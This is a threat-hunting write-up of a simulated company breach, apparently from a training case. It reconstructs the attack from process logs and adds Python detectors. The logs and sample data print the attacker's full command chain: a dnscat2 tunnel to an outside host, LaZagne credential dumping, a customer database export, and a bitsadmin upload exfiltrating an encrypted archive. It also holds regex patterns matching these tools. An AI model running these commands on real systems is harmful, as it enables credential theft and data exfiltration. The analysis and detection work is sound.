2024-08-18 16:59:29.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f ./dnscat2 thesockwhisperer.com cmd.exe 9c3f630fb85b0616d818c52497abd1813b13aeecc2db11b964fcd9972ef007a1 7SSS-DESKTOP mioz
2024-08-18 17:16:33.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f whoami cmd.exe e1b705ffe75332c1f251c2e8f16301fd0fd5fc66750d0c434a24977733028986 7SSS-DESKTOP mioz
2024-08-18 17:30:29.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Invoke-WebRequest -Uri https://github.com/AlessandroZ/LaZagne/download/laZagne.exe -OutFile C:\Users\mioz\downloads\laZagne.exe powershell.exe fa41e3f1a707893875af72648169f5e84ab5bea98290dd1e356404ab773eb77a 7SSS-DESKTOP mioz
2024-08-18 17:34:33.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net user cmd.exe ee8f750c27018f14046a3897e82191ea94890978fdd7b3a1a3261b6dc7eda66c 7SSS-DESKTOP mioz
2024-08-18 18:20:33.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net view cmd.exe ffb5a555bc34c7c26e7d36c1bd6427ce1671f294ead302e7fdc4873c67f43064 7SSS-DESKTOP mioz
2024-08-18 19:17:33.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net share cmd.exe c8ba941326467c712e4459d3306680ff8bf5f805984b7964cc33473f2ac54697 7SSS-DESKTOP mioz
2024-08-18 19:55:33.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f wmic product get name cmd.exe 94ba1ae4cd17e7a8be724adfc48a46f635e0b5893ed1220f39b62299af73ba40 7SSS-DESKTOP mioz
2024-08-18 20:13:17.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f LaZagne.exe databases -dbvis cmd.exe ba92a9eb09254b381a5e967b2ea019ed9fc3ae9e6c6ae2819231bf7dd8f8037b 7SSS-DESKTOP mioz
2024-08-18 20:46:27.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f LaZagne.exe windows -pypykatz -oN -output C:\Users\mioz\Downloads\creds.txt cmd.exe c7c8341af8569ea82e372f50d670ccbde206027eb3891dedf298033be18aff09 7SSS-DESKTOP mioz
2024-08-18 21:34:16.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f @export on; @export set filename="C:\Users\mioz\Downloads\Customers.csv"; select * from Customers; @export off; dbviscmd.bat b9415aa8f4f64e2716e045a5e27e2485c923729fcaf59d48cefa6b0fa24a30e1 7SSS-DESKTOP mioz
2024-08-19 12:37:12.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f rar a -df -hp sn3@ky C:\Users\mioz\Downloads\feetlover.rar C:\Users\mioz\Downloads\Customers.csv cmd.exe a4d1c3a067cd6e3f4cfa6b78e858d65529b4892a72f5c82c392dd25885e48c74 7SSS-DESKTOP mioz
2024-08-19 13:29:46.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f bitsadmin /create tiptoeing cmd.exe 0ef95713a7fba8297b48a02b6279af2d0148c0e10b12a87d3899dea92a8bae34 7SSS-DESKTOP mioz
2024-08-19 13:32:18.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f bitsadmin /transfer tiptoeing /upload https://liarliarsocksonfire.net/wegotthegoods/feetlover.rar C:\Users\mioz\downloads\feetlover.rar cmd.exe 79101b1b0faec987268ad690b7ddd6078afb6c2466dc2957155617c1d936dfbb 7SSS-DESKTOP mioz
2024-08-19 13:36:29.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f bitsadmin /complete tiptoeing cmd.exe d55ecd15b8ac05d72cf1d15d94bd1b570215dec19a631e8a3d67cff96fa1e864 7SSS-DESKTOP mioz

This file turns out not to be an image file at all, but rather a text file masquerading as one. After the target opens the malicious .jpeg file...

  1. ...a PowerShell script is dropped (named talking_socks.ps1, as confirmed in FileCreationEvents) and executed.
  2. This, in turn, downloads, extracts and executes dnscat2 from downloads.skullsecurity.org. This is a legitimate tool by Ron Bowes (iagox86 on GitHub), described on its GitHub page as a tool designed to create an encrypted command-and-control (C&C) channel over the DNS protocol, which is an effective tunnel out of almost every network; the tool is used to create said encrypted C2 channel on Mike Oz's computer, granting hands-on-keyboard access.
  3. They use this access to first run whoami, a discovery command.
  4. This is followed by downloading LaZagne off its GitHub page in the same manner as dnscat2. This is an open source application used to retrieve lots of passwords stored on a local computer.
  5. They follow this with a standard set of discovery commands: net user, net view, net share and wmic product get name; the latter lists the names of all installed software. wmic was a command line tool for Windows Management Instrumentation (WMI) [Microsoft Learn], and with this command they can learn things such as which database software is in use.
  6. Afterwards, they use LaZagne to dump credentials for the databases and any credentials held by LSASS (Local Security Authority Subsystem Service), which keeps credentials in memory [Microsoft Learn].
  7. Finally, they run dbviscmd.bat (a legitimate command line interface for DbVisualizer) to dump the Customers database contents to a file named Customers.csv, which is likely full of sensitive data.

Afterwards, they use the same rar as before (see [2]) to compress and encrypt the file before uploading it to their server using bitsadmin.
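For the chain in steps 1 to 7 above and the rar/bitsadmin follow-up, here is an added example (not the writeup's own code) that scores each host's process timeline by kill-chain stage and alerts when one host passes through several distinct stages within a window; a single discovery command on its own does not fire. The rows are constructed from Mike Oz's ProcessEvents above (hashes dropped) and HR-LAPTOP is an invented benign host.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample mirroring the ProcessEvents rows for Mike Oz's host above,
# plus an invented benign host that runs one discovery command and a routine
# BITS download and must not trigger.
EVENTS = [
    ("7SSS-DESKTOP", "mioz", "2024-08-18 16:58:29", r"Invoke-WebRequest -Uri https://downloads.skullsecurity.org/dnscat2.zip -OutFile C:\Users\mioz\downloads\dnscat2.zip"),
    ("7SSS-DESKTOP", "mioz", "2024-08-18 16:59:29", "./dnscat2 thesockwhisperer.com"),
    ("7SSS-DESKTOP", "mioz", "2024-08-18 17:16:33", "whoami"),
    ("7SSS-DESKTOP", "mioz", "2024-08-18 17:30:29", r"Invoke-WebRequest -Uri https://github.com/AlessandroZ/LaZagne/download/laZagne.exe -OutFile C:\Users\mioz\downloads\laZagne.exe"),
    ("7SSS-DESKTOP", "mioz", "2024-08-18 17:34:33", "net user"),
    ("7SSS-DESKTOP", "mioz", "2024-08-18 19:55:33", "wmic product get name"),
    ("7SSS-DESKTOP", "mioz", "2024-08-18 20:13:17", "LaZagne.exe databases -dbvis"),
    ("7SSS-DESKTOP", "mioz", "2024-08-18 21:34:16", r'@export on; @export set filename="C:\Users\mioz\Downloads\Customers.csv"; select * from Customers; @export off;'),
    ("7SSS-DESKTOP", "mioz", "2024-08-19 12:37:12", r"rar a -df -hp sn3@ky C:\Users\mioz\Downloads\feetlover.rar C:\Users\mioz\Downloads\Customers.csv"),
    ("7SSS-DESKTOP", "mioz", "2024-08-19 13:32:18", r"bitsadmin /transfer tiptoeing /upload https://liarliarsocksonfire.net/wegotthegoods/feetlover.rar C:\Users\mioz\downloads\feetlover.rar"),
    ("HR-LAPTOP", "jdoe", "2024-08-18 09:12:00", "net view"),
    ("HR-LAPTOP", "jdoe", "2024-08-18 09:20:00", r"bitsadmin /transfer patching /download https://example.invalid/patch.msi C:\Temp\patch.msi"),
]

# Ordered rules: the first match wins, so fetching a tool with Invoke-WebRequest
# counts as tool_download rather than as the tool's own stage.
STAGE_RULES = [
    ("tool_download", re.compile(r"invoke-webrequest\s+-uri\s+\S*?(dnscat2|lazagne)", re.I)),
    ("c2_tunnel", re.compile(r"\bdnscat2\b", re.I)),
    ("discovery", re.compile(r"^(whoami|net\s+(user|view|share)|wmic\s+product)\b", re.I)),
    ("credential_access", re.compile(r"\blazagne\.exe\b", re.I)),
    ("collection", re.compile(r"@export\s+on|dbviscmd\.bat|^xcopy\b", re.I)),
    ("archive", re.compile(r"^rar\s+a\b.*\s-hp", re.I)),
    ("exfil", re.compile(r"^bitsadmin\s+/transfer\s+\S+\s+/upload\b", re.I)),
]


def classify(cmd):
    """Map one command line to a kill-chain stage, or None if it matches no rule."""
    for stage, rx in STAGE_RULES:
        if rx.search(cmd):
            return stage
    return None


def build_timelines(events):
    """Group stage hits per (host, user), sorted by time: [(ts, stage, cmd), ...]."""
    timelines = defaultdict(list)
    for host, user, ts, cmd in events:
        stage = classify(cmd)
        if stage:
            when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
            timelines[(host, user)].append((when, stage, cmd))
    for hits in timelines.values():
        hits.sort()
    return timelines


def find_kill_chains(events, window=timedelta(hours=48), min_stages=4):
    """Alert when one host/user passes through >= min_stages distinct stages within window."""
    alerts = []
    for (host, user), hits in build_timelines(events).items():
        best = None
        for i, (start, _, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - start <= window]
            stages = []
            for _, stage, _ in in_window:
                if stage not in stages:
                    stages.append(stage)  # keep first-seen order for the analyst
            if len(stages) >= min_stages and (best is None or len(stages) > len(best["stages"])):
                best = {"hostname": host, "username": user,
                        "start": in_window[0][0], "end": in_window[-1][0],
                        "stages": stages, "commands": [c for _, _, c in in_window]}
        if best:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for a in find_kill_chains(EVENTS):
        print(f"{a['hostname']}/{a['username']} {a['start']} -> {a['end']}: {' > '.join(a['stages'])}")
```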

Since there are no other signs of activity on Mike Oz's computer, it's time to pivot to checking the CFO's and CEO's devices, since they downloaded malicious files sent by "Mike Oz" (see [6]).

FileCreationEvents
| where filename =~ "decision.docx"
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
hostname timestamp parent_process_name parent_process_hash process_commandline process_name process_hash username
SCHR-MACHINE 2024-08-19 15:10:12.0000 Explorer.exe e84012727be100a14d8da8fae31d92ec76d449c82d361acbb852ad9afa1d9328 "C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" "C:\Users\chcetkipu\Downloads\decision.docx" WINWORD.EXE 00e659e3b539afbfbd94c5b886d87e5b4b29cc9c6344b207080a2b580cd07259 chcetkipu
SCHR-MACHINE 2024-08-19 15:10:13.0000 WINWORD.EXE 9e08a6bd9b47a4a9f88ca7d3f4e15bf5fe374dfb856d8ec4768c9f41b54c9547 C:\Users\chcetkipu\Downloads\talking_socks.ps1 talking_socks.ps1 27d875b422f0bc7a339184f557f2fe65c9a208f752f03bae2ffeaecfbf454b1c chcetkipu
SCHR-MACHINE 2024-08-19 15:20:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Invoke-WebRequest -Uri https://downloads.skullsecurity.org/dnscat2.zip -OutFile C:\Users\chcetkipu\downloads\dnscat2.zip powershell.exe ca51d0a0b66372e883777a172bba8a170de7ba6fc1ab6d6be7a2fa26b125758c chcetkipu
SCHR-MACHINE 2024-08-19 16:13:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f ./dnscat2 thesockwhisperer.com cmd.exe 81564154c486799e03501a3c9414f6b8dafd4a758b21bc66b26dfecf2ae501dc chcetkipu
SCHR-MACHINE 2024-08-19 17:01:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Invoke-WebRequest -Uri https://github.com/AlessandroZ/LaZagne/download/laZagne.exe -OutFile C:\Users\chcetkipu\downloads\laZagne.exe powershell.exe 20c26c6ee1830573e169b52cb3b6c22eef8561f4a378cc7fdf282e098f75f4c0 chcetkipu
SCHR-MACHINE 2024-08-20 16:03:28.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f whoami cmd.exe 9d6b7a0f6d15faa66197c68da82969c5047fcb1c8d07f8069e2b7217f7cb0aa1 chcetkipu
SCHR-MACHINE 2024-08-20 16:45:28.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net user cmd.exe f3efca8aca8cfe9a54e9d6ac121d3d21d03116dc482c54741ecadd206bea8137 chcetkipu
SCHR-MACHINE 2024-08-20 17:12:28.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net view cmd.exe 987713288f8a377964ebf3fadef105b723fb6eed9baedd46d256d0440da84e60 chcetkipu
SCHR-MACHINE 2024-08-20 17:47:28.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net share cmd.exe ad82b439f52b62698855dc059f73ad858a355a329587d7bec9222ed261e71e94 chcetkipu
SCHR-MACHINE 2024-08-20 18:45:28.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f wmic product get name cmd.exe 5d68b5d5cfbee471031597da65e65c6eaf76d50346f62f988aaf43445b1d6f12 chcetkipu
SCHR-MACHINE 2024-08-20 19:04:46.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f LaZagne.exe windows -pypykatz -oN -output C:\Users\chcetkipu\Downloads\creds.txt cmd.exe b433793dbd62db22c28d4015fcb1020ca7b4b2aa73bd15f99c1ffeedfa35ac26 chcetkipu
SCHR-MACHINE 2024-08-20 19:57:30.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f C:\Windows\Explorer.EXE dbviscmd.bat 3988b17aafea0f87d680f545919238426e9f58da75f45c9526c35fc90827e730 chcetkipu
9RGD-MACHINE 2024-08-19 14:52:49.0000 Explorer.exe b8754bc70053e026a5a273fcd9753d971fd58cb11fdd4e434be57fa5e4fc91a8 "C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" "C:\Users\brentoe\Downloads\decision.docx" WINWORD.EXE ad2f8ed57acece4d79755623e0bc73795134a4110733fd65fbce4993ba42895f brentoe
9RGD-MACHINE 2024-08-19 14:52:50.0000 WINWORD.EXE 28a68ce810484e4396fd0f354a28ac8ec25e84411b3c0b33309fcbbd5e7c6577 C:\Users\brentoe\Downloads\talking_socks.ps1 talking_socks.ps1 e26d40c010c04e927616bb6598a54f0d601a3469546b0afc3a03854434794b12 brentoe
9RGD-MACHINE 2024-08-19 15:30:50.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Invoke-WebRequest -Uri https://downloads.skullsecurity.org/dnscat2.zip -OutFile C:\Users\brentoe\downloads\dnscat2.zip powershell.exe 5c4aa6e1ac33b606f680213a7b9291ce1be6fc6803a6cca6f7b655edcb1100ac brentoe
9RGD-MACHINE 2024-08-19 15:53:50.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f ./dnscat2 thesockwhisperer.com cmd.exe 90273b9563e30bfdd2d8b59ef7e086f3883edc0f1c1b5417f6589a1379cec9c2 brentoe
9RGD-MACHINE 2024-08-19 16:26:50.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f Invoke-WebRequest -Uri https://github.com/AlessandroZ/LaZagne/download/laZagne.exe -OutFile C:\Users\brentoe\downloads\laZagne.exe powershell.exe 5dfa9368baa00cb71b395be9db3319ee42fb50c46299cb3a8ab493afb0448eb9 brentoe
9RGD-MACHINE 2024-08-20 16:02:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f whoami cmd.exe adc3383934e8e6fa9eb48b9af6472cc040491feead832c97e592f9e1f1850434 brentoe
9RGD-MACHINE 2024-08-20 16:11:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net user cmd.exe dd6b971538a2565fa9195d94a1baf481885439063420a25b8206916eb71fb1df brentoe
9RGD-MACHINE 2024-08-20 16:27:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net view cmd.exe 6f411997fe3f0117771b3d1741ae1485e7b2ff2fd01848960a51962e4b1a9be6 brentoe
9RGD-MACHINE 2024-08-20 16:56:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f net share cmd.exe ffbed5cd9470c570be393f9d0ce7845183d99213de6ffd9e82e78cd860439fe7 brentoe
9RGD-MACHINE 2024-08-20 17:21:49.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f wmic product get name cmd.exe a842a12daef28435a11b122892a89e4b04e5d3587e5ef4cf62b2eda7a55f822a brentoe
9RGD-MACHINE 2024-08-20 17:45:18.0000 cmd.exe 614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f LaZagne.exe windows -pypykatz -oN -output C:\Users\brentoe\Downloads\creds.txt cmd.exe 6cec082245b2b79203b5d5aad5b91402e1c456eac11487ea9feb4c334736170a brentoe

Indeed, the decision.docx file drops the same PowerShell script, though this time the threat actors seem mostly content to just dump the credentials using LaZagne. There are no further signs of activity until 2024-08-30 at 18:50:58, when the threat actors return and use their hands-on-keyboard access to exfiltrate information from the CEO's and CFO's computers and from the Jus de Chaussette servers, likely documents only the CEO and CFO would have access to (see [2]).
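The same sequence shows up on both hosts: a run of discovery commands (whoami, net user, net view, net share, wmic product get name), then a LaZagne execution writing creds.txt. The detection below is an added example, not code from the KC7 case or this write-up; it groups constructed process events (modelled on the table above, with hostnames, users and command lines from the page, hashes omitted, plus a hypothetical benign HELPDESK-PC row) by host and user, and flags any actor whose discovery commands are followed within a time window by a credential dump, listing the tooling observed for that actor:

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands seen on both victim hosts, and the tools that followed them.
RECON_CMDS = {"whoami", "net user", "net view", "net share", "wmic product get name"}
TOOLS = {"lazagne": "LaZagne", "dnscat2": "dnscat2"}  # command-line substring -> label

def classify(cmdline):
    """Return 'recon', a tool label, 'download:<tool>' for an Invoke-WebRequest fetch, or None."""
    low = cmdline.strip().lower()
    if low in RECON_CMDS:
        return "recon"
    for marker, label in TOOLS.items():
        if marker in low:
            return ("download:" if "invoke-webrequest" in low else "") + label
    return None

def find_recon_to_dump(events, window=timedelta(hours=6), min_recon=3):
    """Flag each (host, user) where at least min_recon discovery commands run within
    `window` before a LaZagne execution. events: (host, 'YYYY-MM-DD HH:MM:SS', cmdline, user)."""
    by_actor = defaultdict(list)
    for host, ts, cmd, user in events:
        by_actor[(host, user)].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), classify(cmd)))
    findings = []
    for (host, user), evs in by_actor.items():
        evs.sort(key=lambda e: e[0])
        recon_times, tools = [], sorted({k for _, k in evs if k not in ("recon", None)})
        for t, kind in evs:
            if kind == "recon":
                recon_times.append(t)
            elif kind == "LaZagne" and (n := sum(t - r <= window for r in recon_times)) >= min_recon:
                findings.append({"host": host, "user": user, "recon_before_dump": n,
                                 "dump_at": t.isoformat(sep=" "), "tools": tools})
                break  # one finding per actor is enough for triage
    return findings

# Constructed sample modelled on the write-up's process table (hashes omitted).
SAMPLE_EVENTS = [
    ("SCHR-MACHINE", "2024-08-20 16:03:28", "whoami", "chcetkipu"),
    ("SCHR-MACHINE", "2024-08-20 16:45:28", "net user", "chcetkipu"),
    ("SCHR-MACHINE", "2024-08-20 18:45:28", "wmic product get name", "chcetkipu"),
    ("SCHR-MACHINE", "2024-08-20 19:04:46", r"LaZagne.exe windows -pypykatz -oN -output C:\Users\chcetkipu\Downloads\creds.txt", "chcetkipu"),
    ("9RGD-MACHINE", "2024-08-19 15:30:50", r"Invoke-WebRequest -Uri https://downloads.skullsecurity.org/dnscat2.zip -OutFile C:\Users\brentoe\downloads\dnscat2.zip", "brentoe"),
    ("9RGD-MACHINE", "2024-08-19 15:53:50", "./dnscat2 thesockwhisperer.com", "brentoe"),
    ("9RGD-MACHINE", "2024-08-20 16:02:49", "whoami", "brentoe"),
    ("9RGD-MACHINE", "2024-08-20 16:11:49", "net user", "brentoe"),
    ("9RGD-MACHINE", "2024-08-20 16:56:49", "net share", "brentoe"),
    ("9RGD-MACHINE", "2024-08-20 17:45:18", r"LaZagne.exe windows -pypykatz -oN -output C:\Users\brentoe\Downloads\creds.txt", "brentoe"),
    ("HELPDESK-PC", "2024-08-20 09:00:00", "whoami", "helpdesk"),  # benign: no dump follows
]
```

Running `find_recon_to_dump(SAMPLE_EVENTS)` yields one finding each for chcetkipu and brentoe and nothing for the helpdesk user; the brentoe finding also lists the dnscat2 download and execution from the previous day, which is the C2 channel the dump was sent over.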

In brief:

  • The threat actors engaged in recon using Jus de Chaussette's own website, particularly focusing on how to contact customer service, any information they could exploit for phishing emails (such as the French president's endorsement of Jus de Chaussette's socks), and any suspicious or controversial information regarding the company. They used three distinct IP addresses during this operation.
  • They gained initial access by using the customer service contact form to upload a malicious dropper masquerading as a .jpeg file.
  • Customer Service Representative Mike Oz took on the case, opened the file, and had a .ps1 file dropped and executed on his device.
  • Said PowerShell script downloaded, installed and executed dnscat2 and LaZagne.
  • dnscat2 was used to establish a connection to the attacker's command and control server and gain hands-on-keyboard access.
  • LaZagne was used to dump credentials from LSASS, including credentials for the customer database and the corporate mailbox.
  • The attackers dumped the contents of the customer database to a .csv file in a staging folder, which they later compressed, encrypted and uploaded to their server.
  • Using Mike Oz's email account, they sent internal phishing emails to CEO Cho Cetkipu and CFO Brooke Entoe with a link to download a malicious .docx file.
  • The process is repeated; the PowerShell script is dropped and executed, the attackers establish a connection to their servers with dnscat2 and dump credentials with LaZagne.
  • Some time later, they connect to the intranet and download sensitive corporate information from it.
  • Finally, they send the extortion email from an external email address.